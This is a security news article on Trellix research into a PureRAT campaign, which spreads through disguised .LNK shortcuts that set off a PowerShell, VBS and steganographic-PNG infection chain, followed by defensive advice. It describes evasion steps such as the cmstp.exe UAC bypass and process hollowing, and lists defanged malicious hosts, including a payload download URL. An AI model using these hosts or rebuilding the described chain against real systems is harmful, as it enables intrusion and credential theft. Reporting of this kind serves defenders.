An active campaign is using PureRAT, a remote access trojan, to drop malicious .LNK shortcut files on Windows systems. Victims face risks including keylogging, remote desktop control, webcam access, and credential harvesting.
The sophisticated RAT is considered dangerous because of its evasive techniques and multi-stage infection chain that leaves almost no trace on the targeted system’s disk, according to Trellix’s Advanced Research Center.
Prashanth A. N. and Mallikarjun Wali, co-authors of the research, said PureRAT demonstrates how far modern Windows malware has evolved beyond the old “malicious file on disk” model.
Attackers combine trusted system tools, in-memory execution, and hidden payload delivery to stay out of sight throughout an intrusion, researchers wrote in a Tuesday post.
According to Trellix, PureRAT’s stealth approach layers multiple evasive techniques into one tightly staged attack chain. Components include steganography in PNG files, fileless payload delivery, scheduled-task persistence, UAC bypass via cmstp.exe, anti-virtualization checks, and process hollowing into Msbuild.exe.
The combination leaves defenders with fewer traditional artifacts on disk and more malicious activity masquerading as legitimate Windows behavior.
PureRAT: Not New, But Getting More Dangerous
PureRAT first appeared on HackForums in January 2023 and quietly lingered until early 2025, when infections began to spike.
The developer, PureCoder, built an ecosystem around it — PureCrypter for obfuscation and PureLogs for credential theft — all sold separately and combined by criminal customers, according to Check Point Research (September 2025).
The operator base is expanding and maturing. A Vietnamese group pivoted from amateur Python scripts to PureRAT, according to Huntress, demonstrating how commercial malware gives advanced capabilities to developing threat actors. That same actor is now believed to be using AI to write campaign code, according to Symantec and Carbon Black research.
PureRAT is also tracked as Morphisec, ResolverRAT, and PureHVNC and has been active and evolving across the research community for over a year.
The latest version of the two-year-old commercial PureRAT has grown from a forum listing into a fileless, AI-assisted, steganography-powered platform deployed by multiple threat groups, Trellix researchers said.
PureRAT Doesn’t Install Itself — Your PC Does
The attack starts with a shortcut file (.LNK) that looks like a document. Click it, and PowerShell silently pulls down a malicious script. According to Trellix, the action is stealthy and does not trigger a pop-up or warning.
No user warning is triggered during the initial infection via the .LNK stage. The file avoids warnings by launching a trusted Windows tool (PowerShell) with hidden, preloaded commands. Because no unknown executable is opened and no elevation is requested, Windows treats the action as routine.
Six steps to infection
- PowerShell downloads a VBS file. The hidden command reaches out to hxxps://crixup[.]com/downloads/tryinggim[.]vbs and saves it to the system’s temporary directory.
- The VBS file launches immediately. Using Start-Process, it runs with the current user’s privileges — no elevation required.
- The VBS copies and hides itself. It copies itself to C:\Users\Public\Downloads\ with a randomized filename, then uses WMI to spawn a new process with ShowWindow = 0 — completely invisible.
- It creates a scheduled task. The task runs every minute indefinitely, ensuring persistence even if interrupted.
- It uses a junk data trick. The VBS is padded with meaningless data to confuse analysts. Hidden inside is an embedded PowerShell script that is extracted and executed.
- The embedded PowerShell reaches out again. It connects to crixup[.]com and downloads what appears to be a PNG file — 0xptimized_MSI.png — which is actually the next-stage payload.
The PNG appears harmless, but the malware is hidden and scrambled inside. PowerShell unpacks it directly into memory — nothing touches the disk.
From there, it moves quickly. It disables UAC using a trusted Windows tool, downloads another disguised payload, and injects it into a legitimate Microsoft process.
Windows sees a trusted process. The attacker sees an open door.
PureRAT then connects back to its command-and-control server, waits for instructions, and reschedules itself every five minutes. By that point, there are no files to detect, no alerts to investigate, and no visible signs for the user.
PureRAT Defenders’ Playbook
Trellix recommends blocking the known IOCs immediately — crixup[.]com, instantservices1[.]ddnsguru[.]com, and 178[.]16[.]52[.]58. Beyond that, the entire attack lives inside legitimate Windows tools, so defenders should alert on PowerShell running hidden or with bypassed execution policies, high-frequency scheduled task creation, and Msbuild.exe or cmstp.exe behaving unusually.
Since nothing malicious ever touches disk, EDR capable of inspecting in-memory .NET loading and process hollowing is essential. Most organizations have no legitimate use for cmstp.exe — restricting it closes the UAC bypass entirely. And as always, least privilege limits the damage if anything gets through.
Image by mouad gnnoni from Pixabay
